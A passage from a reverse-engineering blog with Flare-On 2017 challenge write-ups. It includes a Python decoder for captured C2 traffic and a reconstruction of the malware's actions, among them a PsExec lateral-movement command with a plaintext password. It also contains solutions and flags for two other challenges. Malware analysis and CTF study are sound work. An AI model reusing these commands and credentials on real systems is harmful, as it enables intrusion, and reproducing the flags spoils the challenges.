<span class="n">host</span> <span class="o">=</span> <span class="n">download_data</span><span class="p">[</span><span class="mi">4</span><span class="p">:]</span><span class="o">.</span><span class="n">rstrip</span><span class="p">(</span><span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">)</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"host: </span><span class="si">%</span><span class="s">s, port: </span><span class="si">%</span><span class="s">d"</span> <span class="o">%</span> <span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">port</span><span class="p">),</span> <span class="s">'magenta'</span><span class="p">)</span>
<span class="k">print</span> <span class="n">send_data</span>
<span class="k">print</span>
<span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">2</span><span class="p">:</span>
<span class="k">print</span> <span class="s">"socket -> colse socket"</span>
<span class="k">if</span> <span class="n">send_data</span><span class="p">:</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"dump send data to server.bin"</span><span class="p">,</span> <span class="s">'magenta'</span><span class="p">)</span>
<span class="n">dump</span><span class="p">(</span><span class="s">"server2.bin"</span><span class="p">,</span> <span class="n">send_data</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">3</span><span class="p">:</span>
<span class="k">if</span> <span class="n">mode</span> <span class="o">==</span> <span class="s">"SERVER"</span><span class="p">:</span>
<span class="k">print</span> <span class="p">(</span><span class="s">"socket -> connect | Send: </span><span class="si">%</span><span class="s">d bytes"</span> <span class="o">%</span> <span class="nb">len</span><span class="p">(</span><span class="n">download_data</span><span class="p">))</span>
<span class="n">send_data</span> <span class="o">+=</span> <span class="n">download_data</span>
<span class="k">elif</span> <span class="n">mode</span> <span class="o">==</span> <span class="s">"CLIENT"</span><span class="p">:</span>
<span class="k">print</span> <span class="p">(</span><span class="s">"socket -> connect | Recv: </span><span class="si">%</span><span class="s">d bytes"</span> <span class="o">%</span> <span class="nb">len</span><span class="p">(</span><span class="n">download_data</span><span class="p">))</span>
<span class="n">recv_data</span> <span class="o">+=</span> <span class="n">download_data</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">download_data</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span> <span class="ow">and</span> <span class="n">recv_data</span><span class="p">:</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"Dump recv data to client.bin..."</span><span class="p">,</span> <span class="s">'magenta'</span><span class="p">)</span>
<span class="n">dump</span><span class="p">(</span><span class="s">"client2.bin"</span><span class="p">,</span> <span class="n">recv_data</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">cmd</span> <span class="o">==</span> <span class="mi">4</span><span class="p">:</span>
<span class="k">print</span> <span class="s">"scoket -> recv"</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"cmd error"</span><span class="p">,</span> <span class="s">'red'</span><span class="p">)</span>
<span class="c">########################################### packet functions ########################################## </span>
<span class="k">def</span> <span class="nf">get_mode_by_ip</span><span class="p">(</span><span class="n">ip</span><span class="p">):</span>
<span class="k">print</span> <span class="s">"---------------------------------------------------------------------"</span>
<span class="k">if</span> <span class="n">ip</span> <span class="o">==</span> <span class="s">"192.168.221.91"</span><span class="p">:</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"[Client] "</span><span class="p">,</span> <span class="s">"yellow"</span><span class="p">)</span> <span class="o">+</span> <span class="n">ip</span>
<span class="n">mode</span> <span class="o">=</span> <span class="s">"CLIENT"</span>
<span class="k">return</span> <span class="n">mode</span>
<span class="k">elif</span> <span class="n">ip</span> <span class="o">==</span> <span class="s">'52.0.104.200'</span><span class="p">:</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"[Server] "</span><span class="p">,</span> <span class="s">"cyan"</span><span class="p">)</span> <span class="o">+</span> <span class="n">ip</span>
<span class="n">mode</span> <span class="o">=</span> <span class="s">"SERVER"</span>
<span class="k">return</span> <span class="n">mode</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"get ip error"</span><span class="p">,</span> <span class="s">"red"</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">decode_stage2_packet</span><span class="p">():</span>
<span class="n">collect_data</span> <span class="o">=</span> <span class="s">''</span>
<span class="n">compile_data</span> <span class="o">=</span> <span class="s">''</span>
<span class="n">packet</span> <span class="o">=</span> <span class="n">read_stage2_packet</span><span class="p">()</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">packet</span><span class="p">:</span>
<span class="n">ip_src</span> <span class="o">=</span> <span class="n">i</span><span class="p">[</span><span class="s">'_source'</span><span class="p">][</span><span class="s">'layers'</span><span class="p">][</span><span class="s">'ip'</span><span class="p">][</span><span class="s">'ip.src'</span><span class="p">]</span> <span class="c">#dict </span>
<span class="k">try</span><span class="p">:</span>
<span class="n">data</span> <span class="o">=</span> <span class="n">i</span><span class="p">[</span><span class="s">'_source'</span><span class="p">][</span><span class="s">'layers'</span><span class="p">][</span><span class="s">'data'</span><span class="p">][</span><span class="s">'data.data'</span><span class="p">]</span>
<span class="n">data</span> <span class="o">=</span> <span class="n">data</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s">":"</span><span class="p">,</span><span class="s">""</span><span class="p">)</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s">'hex'</span><span class="p">)</span>
<span class="k">if</span> <span class="n">data</span><span class="p">[:</span><span class="mi">4</span><span class="p">]</span> <span class="o">==</span> <span class="s">'2017'</span><span class="p">:</span>
<span class="n">mode</span> <span class="o">=</span> <span class="n">get_mode_by_ip</span><span class="p">(</span><span class="n">ip_src</span><span class="p">)</span>
<span class="n">collect</span> <span class="o">=</span> <span class="n">data</span>
<span class="n">header_len</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">collect</span><span class="p">[</span><span class="mi">8</span><span class="p">:</span><span class="mh">0xc</span><span class="p">])</span>
<span class="n">body_len</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">collect</span><span class="p">[</span><span class="mh">0xc</span><span class="p">:</span><span class="mh">0x10</span><span class="p">])</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">collect</span><span class="p">)</span> <span class="o">!=</span> <span class="p">(</span><span class="n">header_len</span><span class="o">+</span><span class="n">body_len</span><span class="p">)</span> <span class="ow">and</span> <span class="s">'2017'</span> <span class="ow">in</span> <span class="n">data</span><span class="p">:</span>
<span class="n">collect</span> <span class="o">+=</span> <span class="n">data</span><span class="p">[:</span><span class="n">data</span><span class="o">.</span><span class="n">index</span><span class="p">(</span><span class="s">'2017'</span><span class="p">)]</span>
<span class="n">data</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="n">data</span><span class="o">.</span><span class="n">index</span><span class="p">(</span><span class="s">'2017'</span><span class="p">):]</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">collect</span> <span class="o">+=</span> <span class="n">data</span>
<span class="n">compile_data</span> <span class="o">=</span> <span class="n">collect</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">compile_data</span><span class="p">)</span> <span class="o">==</span> <span class="p">(</span><span class="n">header_len</span><span class="o">+</span><span class="n">body_len</span><span class="p">):</span>
<span class="n">decrypt_data</span> <span class="o">=</span> <span class="n">decrypt</span><span class="p">(</span><span class="n">compile_data</span><span class="p">)</span>
<span class="n">compile_data</span> <span class="o">=</span> <span class="s">''</span>
<span class="n">decompress_data</span> <span class="o">=</span> <span class="n">decompress</span><span class="p">(</span><span class="n">decrypt_data</span><span class="p">,</span> <span class="n">mode</span><span class="p">)</span>
<span class="n">plugin_cmd</span><span class="p">(</span><span class="n">decompress_data</span><span class="p">,</span> <span class="n">mode</span><span class="p">)</span>
<span class="k">except</span> <span class="nb">KeyError</span><span class="p">:</span>
<span class="k">pass</span>
<span class="k">return</span> <span class="mi">0</span>
<span class="k">def</span> <span class="nf">decode_stage3_client</span><span class="p">():</span>
<span class="k">print</span> <span class="s">"================================================================================"</span>
<span class="k">print</span> <span class="s">"============================= decode stage3 client ============================="</span>
<span class="k">print</span> <span class="s">"================================================================================"</span>
<span class="n">clientpacket</span> <span class="o">=</span> <span class="n">read_stage3_packet</span><span class="p">(</span><span class="s">'client2.bin'</span><span class="p">)</span>
<span class="n">mode</span> <span class="o">=</span> <span class="s">"CLIENT"</span>
<span class="k">while</span> <span class="n">clientpacket</span> <span class="o">!=</span> <span class="s">''</span><span class="p">:</span>
<span class="n">clientpacket</span> <span class="o">=</span> <span class="n">clientpacket</span><span class="p">[</span><span class="n">clientpacket</span><span class="o">.</span><span class="n">index</span><span class="p">(</span><span class="s">'2017'</span><span class="p">):]</span>
<span class="k">if</span> <span class="n">clientpacket</span><span class="p">[:</span><span class="mi">4</span><span class="p">]</span> <span class="o">==</span> <span class="s">'2017'</span><span class="p">:</span>
<span class="n">header_len</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">clientpacket</span><span class="p">[</span><span class="mi">8</span><span class="p">:</span><span class="mh">0xc</span><span class="p">])</span>
<span class="n">body_len</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">clientpacket</span><span class="p">[</span><span class="mh">0xc</span><span class="p">:</span><span class="mh">0x10</span><span class="p">])</span>
<span class="k">print</span> <span class="s">"---------------------------------------------------------------------"</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"["</span> <span class="o">+</span> <span class="n">mode</span> <span class="o">+</span> <span class="s">"]"</span><span class="p">,</span> <span class="s">'yellow'</span><span class="p">)</span>
<span class="n">decrypt_data</span> <span class="o">=</span> <span class="n">decrypt</span><span class="p">(</span><span class="n">clientpacket</span><span class="p">)</span>
<span class="n">decompress_data</span> <span class="o">=</span> <span class="n">decompress</span><span class="p">(</span><span class="n">decrypt_data</span><span class="p">,</span> <span class="n">mode</span><span class="p">)</span>
<span class="n">plugin_cmd</span><span class="p">(</span><span class="n">decompress_data</span><span class="p">,</span> <span class="n">mode</span><span class="p">)</span>
<span class="n">clientpacket</span> <span class="o">=</span> <span class="n">clientpacket</span><span class="p">[</span><span class="n">header_len</span> <span class="o">+</span> <span class="n">body_len</span><span class="p">:]</span>
<span class="k">def</span> <span class="nf">decode_stage3_server</span><span class="p">():</span>
<span class="k">print</span> <span class="s">"================================================================================"</span>
<span class="k">print</span> <span class="s">"============================= decode stage3 server ============================="</span>
<span class="k">print</span> <span class="s">"================================================================================"</span>
<span class="n">serverpacket</span> <span class="o">=</span> <span class="n">read_stage3_packet</span><span class="p">(</span><span class="s">'server2.bin'</span><span class="p">)</span>
<span class="n">mode</span> <span class="o">=</span> <span class="s">"SERVER"</span>
<span class="k">while</span> <span class="n">serverpacket</span> <span class="o">!=</span> <span class="s">''</span><span class="p">:</span>
<span class="n">serverpacket</span> <span class="o">=</span> <span class="n">serverpacket</span><span class="p">[</span><span class="n">serverpacket</span><span class="o">.</span><span class="n">index</span><span class="p">(</span><span class="s">'2017'</span><span class="p">):]</span>
<span class="k">if</span> <span class="n">serverpacket</span><span class="p">[:</span><span class="mi">4</span><span class="p">]</span> <span class="o">==</span> <span class="s">'2017'</span><span class="p">:</span>
<span class="n">header_len</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">serverpacket</span><span class="p">[</span><span class="mi">8</span><span class="p">:</span><span class="mh">0xc</span><span class="p">])</span>
<span class="n">body_len</span> <span class="o">=</span> <span class="n">u32</span><span class="p">(</span><span class="n">serverpacket</span><span class="p">[</span><span class="mh">0xc</span><span class="p">:</span><span class="mh">0x10</span><span class="p">])</span>
<span class="k">print</span> <span class="s">"---------------------------------------------------------------------"</span>
<span class="k">print</span> <span class="n">colored</span><span class="p">(</span><span class="s">"["</span> <span class="o">+</span> <span class="n">mode</span> <span class="o">+</span> <span class="s">"]"</span><span class="p">,</span> <span class="s">'cyan'</span><span class="p">)</span>
<span class="n">decrypt_data</span> <span class="o">=</span> <span class="n">decrypt</span><span class="p">(</span><span class="n">serverpacket</span><span class="p">)</span>
<span class="n">decompress_data</span> <span class="o">=</span> <span class="n">decompress</span><span class="p">(</span><span class="n">decrypt_data</span><span class="p">,</span> <span class="n">mode</span><span class="p">)</span>
<span class="n">plugin_cmd</span><span class="p">(</span><span class="n">decompress_data</span><span class="p">,</span> <span class="n">mode</span><span class="p">)</span>
<span class="n">serverpacket</span> <span class="o">=</span> <span class="n">serverpacket</span><span class="p">[</span><span class="n">header_len</span> <span class="o">+</span> <span class="n">body_len</span><span class="p">:</span> <span class="p">]</span>
<span class="c">####################################################################################################### </span>
<span class="n">decode_stage2_packet</span><span class="p">()</span>
<span class="n">decode_stage3_client</span><span class="p">()</span>
<span class="n">decode_stage3_server</span><span class="p">()</span>
</code></pre></div></div>
<hr />
<h2 id="附錄二-完整封包解密-還原-c2-server-與-client-的溝通過程">附錄二: 完整封包解密: 還原 C2 Server 與 Client 的溝通過程</h2>
<h3 id="client-封包解密">Client 封包解密</h3>
<ul>
<li>malware 用密碼 <code class="highlighter-rouge">welcomepass1!1</code> 登入</li>
<li>client 下載 <code class="highlighter-rouge">CRPT</code> 模組 RC4</li>
<li>client 下載 <code class="highlighter-rouge">CRPT</code> 模組 simple substitution cipher</li>
<li>client 下載 <code class="highlighter-rouge">CRPT</code> 模組 CustomBase64</li>
<li>client 下載 <code class="highlighter-rouge">CRPT</code> 模組 XTEA</li>
<li>client 下載 <code class="highlighter-rouge">COMP</code> 模組 ZLib</li>
<li>client 下載 <code class="highlighter-rouge">CMD</code> 模組 File</li>
<li>還原 client 資訊</li>
</ul>
<table>
<thead>
<tr>
<th>Computer Info</th>
<th>context</th>
</tr>
</thead>
<tbody>
<tr>
<td>version</td>
<td>2.1.0</td>
</tr>
<tr>
<td>computer name</td>
<td>LARRYJOHNSON-PC</td>
</tr>
<tr>
<td>user name</td>
<td>larry.johnson</td>
</tr>
<tr>
<td>group name</td>
<td>feye2017 cli</td>
</tr>
</tbody>
</table>
<ul>
<li>用 <code class="highlighter-rouge">File</code> 模組來 List Drive</li>
<li>用 <code class="highlighter-rouge">File</code> 模組來 List Directory</li>
</ul>
<p><img src="https://i.imgur.com/NGvYpjp.png" alt="" /></p>
<ul>
<li>client 下載 <code class="highlighter-rouge">CMD</code> 模組 Shell</li>
<li>用 <code class="highlighter-rouge">Shell</code> 模組開啟 Shell</li>
</ul>
<p><img src="https://i.imgur.com/RvZNVhk.png" alt="" /></p>
<p><img src="https://i.imgur.com/zjjxpE0.png" alt="" /></p>
<p><img src="https://i.imgur.com/C0u7Ktt.png" alt="" /></p>
<p><img src="https://i.imgur.com/chkwERs.png" alt="" /></p>
<p><img src="https://i.imgur.com/sEPWv91.png" alt="" /></p>
<ul>
<li>在 <code class="highlighter-rouge">c:\work\FlareOn2017\Challenge_10 directory</code> 中有個 <code class="highlighter-rouge">TODO.txt</code> 內容是 “Check with Larry about this.”</li>
<li>建立 directory <code class="highlighter-rouge">c:\staging</code></li>
<li>client 下載 <code class="highlighter-rouge">CMD</code> 模組 Screen</li>
<li>還原 BMP 圖檔 (8 bits)</li>
</ul>
<p><img src="https://i.imgur.com/TyWyjGv.png" alt="" /></p>
<ul>
<li>取得 zip 密碼 <code class="highlighter-rouge">infectedinfectedinfectedinfectedinfected919</code></li>
</ul>
<p><img src="https://i.imgur.com/AEatSSf.png" alt="" /></p>
<ul>
<li>Ping larryjohnson-pc 得知 IP address 是 <code class="highlighter-rouge">192.168.221.105</code></li>
<li>下載 <code class="highlighter-rouge">PsExec</code> 到 <code class="highlighter-rouge">c:\staging\pse.exe</code></li>
</ul>
<p><img src="https://i.imgur.com/KGhtpZh.png" alt="" /></p>
<p><img src="https://i.imgur.com/1V7NHSq.png" alt="" /></p>
<p><img src="https://i.imgur.com/3ThvPRq.png" alt="" /></p>
<ul>
<li>下載 Server 版本 的惡意程式 <code class="highlighter-rouge">srv2.exe</code> 到 <code class="highlighter-rouge">c:\staging\srv2.exe</code></li>
</ul>
<p><img src="https://i.imgur.com/lQrGKT3.png" alt="" /></p>
<ul>
<li>下指令 <code class="highlighter-rouge">pse.exe \\larryjohnson-pc -i -c -f -d -u larry.johnson -p n3v3rgunnag1veUup -accepteula srv2.exe</code></li>
<li>client 下載 <code class="highlighter-rouge">CMD</code> 模組 Socket</li>
<li>srv2.exe 在 <code class="highlighter-rouge">larryjohnson-pc</code> 上開啟 port 16452 listening
<ul>
<li>host: 192.168.221.105</li>
<li>port: 16452</li>
</ul>
</li>
<li>
<p>收集透過 <code class="highlighter-rouge">CMD</code> 模組 Socket 傳送與接收的封包
<img src="https://i.imgur.com/em5Gs5w.png" alt="" /></p>
</li>
<li>結束 socket</li>
</ul>
<h3 id="server-封包解密">Server 封包解密</h3>
<ul>
<li>malware 用密碼 <code class="highlighter-rouge">welcomepass1!1</code> 登入</li>
<li>client 下載 <code class="highlighter-rouge">CRPT</code> 模組 Blowfish</li>
<li>client 下載 <code class="highlighter-rouge">CRPT</code> 模組 SimpleXOR</li>
<li>client 下載 <code class="highlighter-rouge">CRPT</code> 模組 DES3</li>
<li>client 下載 <code class="highlighter-rouge">CRPT</code> 模組 Camellia</li>
<li>client 下載 <code class="highlighter-rouge">COMP</code> 模組 ApLib</li>
<li>client 下載 <code class="highlighter-rouge">COMP</code> 模組 Lzo</li>
<li>還原 server 資訊</li>
</ul>
<table>
<thead>
<tr>
<th>Computer Info</th>
<th>context</th>
</tr>
</thead>
<tbody>
<tr>
<td>version</td>
<td>2.1.0</td>
</tr>
<tr>
<td>computer name</td>
<td>LARRYJOHNSON-PC</td>
</tr>
<tr>
<td>user name</td>
<td>larry.johnson</td>
</tr>
<tr>
<td>group name</td>
<td>feye2017 srv</td>
</tr>
</tbody>
</table>
<ul>
<li>還原 BMP 圖檔 (32 bits)</li>
</ul>
<p><img src="https://i.imgur.com/r8EByPw.png" alt="" /></p>
<ul>
<li>List Drive</li>
<li>List Directory</li>
</ul>
<p><img src="https://i.imgur.com/IskDDbE.png" alt="" /></p>
<p><img src="https://i.imgur.com/s0HX4EX.png" alt="" /></p>
<p><img src="https://i.imgur.com/xGd159p.png" alt="" /></p>
<p><img src="https://i.imgur.com/zvEPazD.png" alt="" /></p>
<ul>
<li>建立資料夾 <code class="highlighter-rouge">c:\staging</code></li>
<li>傳送 <code class="highlighter-rouge">cf.exe</code> 到 <code class="highlighter-rouge">c:\staging\cf.exe</code></li>
<li>用 <code class="highlighter-rouge">cf.exe</code> 來加密 lab10.zip 變成 <code class="highlighter-rouge">lab10.zip.cry</code>,指令是 <code class="highlighter-rouge">c:\staging\cf.exe lab10.zip tCqlc2+fFiLcuq1ee1eAPOMjxcdijh8z0jrakMA/jxg=</code></li>
</ul>
<p><img src="https://i.imgur.com/10L6gnw.png" alt="" /></p>
<ul>
<li>刪除 <code class="highlighter-rouge">lab10.zip</code> 並關閉 shell</li>
</ul>
<p><img src="https://i.imgur.com/3skXk3y.png" alt="" /></p>
2017 Flare-On Challenge 5 pewpewboat.exe
2018-05-24T00:00:00+00:00
http://0x00.tw/2018/05/24/2017 Flare-On #5 pewpewboat
<p>Actually, <code class="highlighter-rouge">pewpewboat.exe</code> is not a Windows PE file but an x64 ELF binary. When we launch the binary in linux, we can see that is a the Battleship game.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Loading first pew pew map...
1 2 3 4 5 6 7 8
_________________
A |_|_|_|_|_|_|_|_|
B |_|_|_|_|_|_|_|_|
C |_|_|_|_|_|_|_|_|
D |_|_|_|_|_|_|_|_|
E |_|_|_|_|_|_|_|_|
F |_|_|_|_|_|_|_|_|
G |_|_|_|_|_|_|_|_|
H |_|_|_|_|_|_|_|_|
Rank: Seaman Recruit
Welcome to pewpewboat! We just loaded a pew pew map, start shootin'!
Enter a coordinate:
</code></pre></div></div>
<p>Let’s try to typing some “coordinate” to see what happens. There will be two results: <code class="highlighter-rouge">You missed :( </code> and <code class="highlighter-rouge">Nice shot! Hit!</code>, if we get all of we need to hit coordinate, we can get message <code class="highlighter-rouge">sunk all the ships</code>.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 1 2 3 4 5 6 7 8
A |_|_|_|_|_|_|_|_|
B |_|_|_|X|X|X|X|_|
C |_|_|_|X|_|_|_|_|
D |_|_|_|X|_|_|_|_|
E |_|_|_|X|X|X|X|_|
F |_|_|_|X|_|_|_|_|
G |_|_|_|X|_|_|_|_|
H |_|_|_|_|_|_|_|_|
Rank: Seaman Recruit
Nice shot! Hit!
You sunk all the ships!!
NotMd5Hash("BNKM") >
</code></pre></div></div>
<p>And we need to typing something in last line <code class="highlighter-rouge">NotMd5Hash("BNKM") ></code>, when we try a few times, we can know the letters inside the quotation mark is random. So we can patch the verification method, in order for us to continue to the next game.</p>
<ul>
<li>Analysis:</li>
</ul>
<p>We can install “gdbserver” tool in ubuntu, and bind ip in <code class="highlighter-rouge">0.0.0.0</code>. Thus we can dynamically debug with IDA Pro.</p>
<p><code class="highlighter-rouge">0x403530</code> function for <code class="highlighter-rouge">notmd5hash</code>, in this function we can find words and <code class="highlighter-rouge">rand()</code>.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> v7 = 'N';
v8 = 'o';
v9 = 't';
v10 = 'M';
v11 = 'd';
v12 = '5';
v13 = 'H';
v14 = 'a';
v15 = 's';
v16 = 'h';
v17 = '(';
v18 = '"';
v19 = '%';
v20 = 's';
v21 = '"';
v22 = ')';
v23 = ' ';
v24 = '>';
v25 = ' ';
v26 = '\0';
</code></pre></div></div>
<p>After we patch <code class="highlighter-rouge">0x403BE0 call sub_403530</code>, we can make the position guess of the coordinates more smoothly, or reversing to find the correct coordinates in the binary.</p>
<ul>
<li>Solutions:</li>
</ul>
<p>I once also solved a challenge about Battleship game, the challenge name was <a href="http://0x00.tw/2017/08/26/2017-HITCON-CMT-mini-wargame/">winmine.exe</a>, one of challenge in HITCON CMT 2017 mini wargame. At that time, I reverse to find correct coordinates in binary. After the game, someone provided a different solution for me, I think this solution is very interesting. That is using <a href="https://www.vmware.com/tw/products/workstation-pro.html">vmware workstation snapshot</a> to remember the game screen that has been marked.</p>
<p>We collect letters every turn, when we sunk all the ships, we got the those letters from game screen.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>F
H
G
U
Z
R
E
J
V
O
</code></pre></div></div>
<p>Reaching the final level, we got those message</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>You sunk all the ships!!
1 2 3 4 5 6 7 8
A |_|_|_|_|_|_|_|_|
B |_|_|_|_|_|_|_|_|
C |_|_|_|_|_|_|_|_|
D |_|_|_|_|_|_|_|_|
E |_|_|_|_|_|_|_|_|
F |_|_|_|_|_|_|_|_|
G |_|_|_|_|_|_|_|_|
H |_|_|_|_|_|_|_|_|
Rank: Congratulation!
Aye!PEWYouPEWfoundPEWsomePEWlettersPEWdidPEWya?PEWToPEWfindPEWwhatPEWyou'rePEWlookingPEWfor,PEWyou'llPEWwantPEWtoPEWre-orderPEWthem:PEW9,PEW1,PEW2,PEW7,PEW3,PEW5,PEW6,PEW5,PEW8,PEW0,PEW2,PEW3,PEW5,PEW6,PEW1,PEW4.
PEWNextPEWyouPEWletPEW13PEWROTPEWinPEWthePEWsea!PEWTHEPEWFINALPEWSECRETPEWCANPEWBEPEWFOUNDPEWWITHPEWONLYPEWTHEPEWUPPERPEWCASE.
Thanks for playing!
</code></pre></div></div>
<p>After we delete “PEW” words, we can get real messages.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Aye! You found some letters did ya? To find what you're looking for, you'll want to
re-order them:
9, 1, 2, 7, 3, 5, 6, 5, 8, 0, 2, 3, 5, 6, 1, 4.
Next you let 13 ROT in the sea! THE FINAL SECRET CAN BE FOUND WITH ONLY THE UPPER CASE.
Thanks for playing!
</code></pre></div></div>
<p>According this message to re-order we collect letters <code class="highlighter-rouge">FHGUZREJVO</code>. The result is <code class="highlighter-rouge">OHGJURERVFGUREHZ</code>. Next, let “ROT13” the string to become <code class="highlighter-rouge">BUTWHEREISTHERUM</code>.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 1 2 3 4 5 6 7 8
A |_|_|_|_|_|_|_|_|
B |_|_|_|_|_|_|_|_|
C |_|_|_|_|_|_|_|_|
D |_|_|_|_|_|_|_|_|
E |_|_|_|_|_|_|_|_|
F |_|_|_|_|_|_|_|_|
G |_|_|_|_|_|_|_|_|
H |_|_|_|_|_|_|_|_|
Rank: Seaman Recruit
Welcome to pewpewboat! We just loaded a pew pew map, start shootin'!
Enter a coordinate: BUTWHEREISTHERUM
very nicely done! here have this key: y0u__sUnK_mY__P3Wp3w_b04t@flare-on.com
</code></pre></div></div>
<p>The flag is: <code class="highlighter-rouge">y0u__sUnK_mY__P3Wp3w_b04t@flare-on.com</code></p>
<hr />
<ul>
<li>Challenge Author: Tyler Dean (@spresec)</li>
<li><a href="https://github.com/0x000050/CTF/blob/master/2017_Flare-On/05_Pewpewboat/pewpewboat.exe">Challenge download</a></li>
</ul>
2017 Flare-On Challenge 4 Notepad.exe
2018-05-23T00:00:00+00:00
http://0x00.tw/2018/05/23/2017 Flare-On #4 notepad
<p><code class="highlighter-rouge">Notepad.exe</code> is a Windows x86 executable, it seems to be a modified version of Microsoft’s <code class="highlighter-rouge">Notepad.exe</code>. Let’s launch this binary and it looks nothing special.</p>
<p><img src="https://i.imgur.com/ZtdIJB9.png" alt="" /></p>
<ul>
<li>Analysis:</li>
</ul>
<p>IDA can properly apply Microsoft’s PDB for <code class="highlighter-rouge">Notepad.exe</code> from Microsoft’s symbol server. But the entry point of executable has been modified to <code class="highlighter-rouge">0x1013a00</code>.</p>
<p><img src="https://i.imgur.com/6KjROey.png" alt="" /></p>
<p>Go to <code class="highlighter-rouge">0x1013a00</code> function, we can see interesting thing is entry point in the <code class="highlighter-rouge">.rsrc</code> section, instead of <code class="highlighter-rouge">.text</code> section. And we can see interesting strings: <code class="highlighter-rouge">%USERPROFILE%\flareon2016challenge</code> This is hint means you will need the binaries from the “flareon 2016 challenges”. (We can download these files from the <a href="http://www.flare-on.com/">official website</a>), at the same time, using stack based strings is also one of the skills of malware.</p>
<p><img src="https://i.imgur.com/jWZce3e.png" alt="" /></p>
<p>Here we can restore these strings:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>%USERPROFILE%\flareon2016challenge
ImageHlp.dll
CheckSumMappedFile
User32.dll
MessageBoxA
</code></pre></div></div>
<p>And we can get other strings from “Strings window” in IDA</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>\\key.bin
%USERPROFILE%
\\flareon2016challenge
where's my key file?
what's wrong with my key file?
</code></pre></div></div>
<p>After that, we can see other one skills of malware: Dynamically loading library modules. we can using IDA dynamically debug to understand those library. This is originally version.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> v77 = 0x1013C4E;
v6 = sub_10153D0(0x8FECD63F);
v89 = sub_1015310(v6, 0x63D6C065);
v90 = sub_1015310(v6, 0xA5E1AC97);
v91 = sub_1015310(v6, 0x23545978);
v93 = sub_1015310(v6, 0x7C0017A5);
v94 = sub_1015310(v6, 0x56C61229);
v95 = sub_1015310(v6, 0x7B073C59);
v96 = sub_1015310(v6, 0xFFD97FB);
v109 = sub_1015310(v6, 0x10FA6516);
v97 = sub_1015310(v6, 0xE80A791F);
v98 = sub_1015310(v6, 0xDF7D9BAD);
v99 = sub_1015310(v6, 0xB12C56D7);
v100 = sub_1015310(v6, 0xEC0E4E8E);
v101 = sub_1015310(v6, 0x7C0DFCAA);
v103 = sub_1015310(v6, 0xD3324904);
v104 = sub_1015310(v6, 0xB2089259);
v105 = sub_1015310(v6, 0xEEB585D8);
v106 = sub_1015310(v6, 0x3810CB0F);
v107 = sub_1015310(v6, 0xF02A93BE);
v108 = sub_1015310(v6, 0xF72A53BA);
</code></pre></div></div>
<p>First, we follow first line <code class="highlighter-rouge">v77 = 0x1013c4e</code>, that means <code class="highlighter-rouge">v77</code>’s value stored <code class="highlighter-rouge">EIP</code>. We can change assembly view to understand it, first line is <code class="highlighter-rouge">$+5</code> also mean <code class="highlighter-rouge">$pc+5</code>. In IDA, <code class="highlighter-rouge">$</code> is beginning of same instruction (which is not the <code class="highlighter-rouge">EIP</code> which would point to the next instruction). And <code class="highlighter-rouge">call $+5</code> is probably call to next instruction, and next line for <code class="highlighter-rouge">pop</code> address, such usage usually used to write shellcode, it used to get EIP address.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.rsrc:01013C49 call $+5 //$pc+5
.rsrc:01013C4E pop [ebp+var_88]
</code></pre></div></div>
<p>and we can using IDA dynamically debug to get those library’s name.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> v77 = 0x1013C4E; // $+5
user32.dll = sub_10153D0(0x8FECD63F);
kernel32_FindFirstFileA = sub_1015310(user32.dll, 0x63D6C065);
kernel32_FindNextFileA = sub_1015310(user32.dll, 0xA5E1AC97);
kernel32_FindClose = sub_1015310(user32.dll, 0x23545978);
kernel32_CreateFileA = sub_1015310(user32.dll, 0x7C0017A5);
kernel32_CreateFileMappingA = sub_1015310(user32.dll, 0x56C61229);
kernel32_MapViewOfFile = sub_1015310(user32.dll, 0x7B073C59);
kernel32_CloseHandle = sub_1015310(user32.dll, 0xFFD97FB);
kernel32_ReadFile = sub_1015310(user32.dll, 0x10FA6516);
kernel32_WriteFile = sub_1015310(user32.dll, 0xE80A791F);
